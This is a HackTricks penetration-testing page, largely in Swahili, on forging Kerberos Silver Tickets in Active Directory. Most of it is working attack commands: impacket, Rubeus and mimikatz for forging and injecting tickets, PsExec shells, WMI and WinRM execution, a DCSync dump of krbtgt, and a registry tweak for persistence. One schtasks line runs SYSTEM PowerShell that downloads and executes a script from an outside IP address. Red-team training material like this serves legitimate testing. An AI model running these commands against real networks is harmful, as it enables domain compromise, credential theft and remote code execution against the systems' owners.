Silver Ticket

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Silver ticket

Shambulio la Silver Ticket linahusisha unyakuzi wa tiketi za huduma katika mazingira ya Active Directory (AD). Njia hii inategemea kupata NTLM hash ya akaunti ya huduma, kama akaunti ya kompyuta, ili kuunda tiketi ya Ticket Granting Service (TGS). Kwa tiketi hii iliyoundwa, mshambuliaji anaweza kufikia huduma maalum kwenye mtandao, akijifanya kuwa mtumiaji yeyote, kwa kawaida akilenga haki za usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa ajili ya kuunda tiketi ni salama zaidi na zisizoweza kugundulika.

warning

Silver Tickets hazigunduliki kwa urahisi kama Golden Tickets kwa sababu zinahitaji tu hash ya akaunti ya huduma, si akaunti ya krbtgt. Hata hivyo, zinapungukiwa na huduma maalum wanazolenga. Aidha, kuiba tu nenosiri la mtumiaji.

Zaidi ya hayo, ikiwa unavunja nenosiri la akaunti na SPN unaweza kutumia nenosiri hilo kuunda Silver Ticket ukijifanya kuwa mtumiaji yeyote kwa huduma hiyo.

Kwa ajili ya kuunda tiketi, zana tofauti zinatumika kulingana na mfumo wa uendeshaji:

On Linux

bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Kwenye Windows

bash
# Using Rubeus
## /ldap option is used to get domain data automatically
## With /ptt we already load the tickt in memory
rubeus.exe asktgs /user:<USER> [/rc4:<HASH> /aes128:<HASH> /aes256:<HASH>] /domain:<DOMAIN> /ldap /service:cifs/domain.local /ptt /nowrap /printcmd

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.

Available Services

Service TypeService Silver Tickets
WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Kulingana na OS pia:

WSMAN

RPCSS

WinRM

HOST

HTTP

Katika matukio mengine unaweza tu kuuliza: WINRM

Scheduled TasksHOST
Windows File Share, also psexecCIFS
LDAP operations, included DCSyncLDAP
Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Ticketskrbtgt

Using Rubeus you may ask for all these tickets using the parameter:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets Event IDs

  • 4624: Account Logon
  • 4634: Account Logoff
  • 4672: Admin Logon

Persistence

To avoid machines from rotating their password every 30 days set HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1 or you could set HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to a part of the remote filesystem just doing something like:

bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

Utapata pia uwezo wa kupata shell ndani ya mwenyeji au kutekeleza amri za kawaida ukitumia psexec:

PsExec/Winexec/ScExec

HOST

Kwa ruhusa hii unaweza kuunda kazi za ratiba katika kompyuta za mbali na kutekeleza amri za kawaida:

bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

Kwa tiketi hizi unaweza kutekeleza WMI katika mfumo wa mwathirika:

bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Pata maelezo zaidi kuhusu wmiexec katika ukurasa ufuatao:

WmiExec

HOST + WSMAN (WINRM)

Kwa ufikiaji wa winrm juu ya kompyuta unaweza kuipata na hata kupata PowerShell:

bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm:

WinRM

warning

Note that winrm lazima iwe hai na inasikiliza kwenye kompyuta ya mbali ili kuweza kuipata.

LDAP

With this privilege you can dump the DC database using DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Jifunze zaidi kuhusu DCSync katika ukurasa ufuatao:

DCSync

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks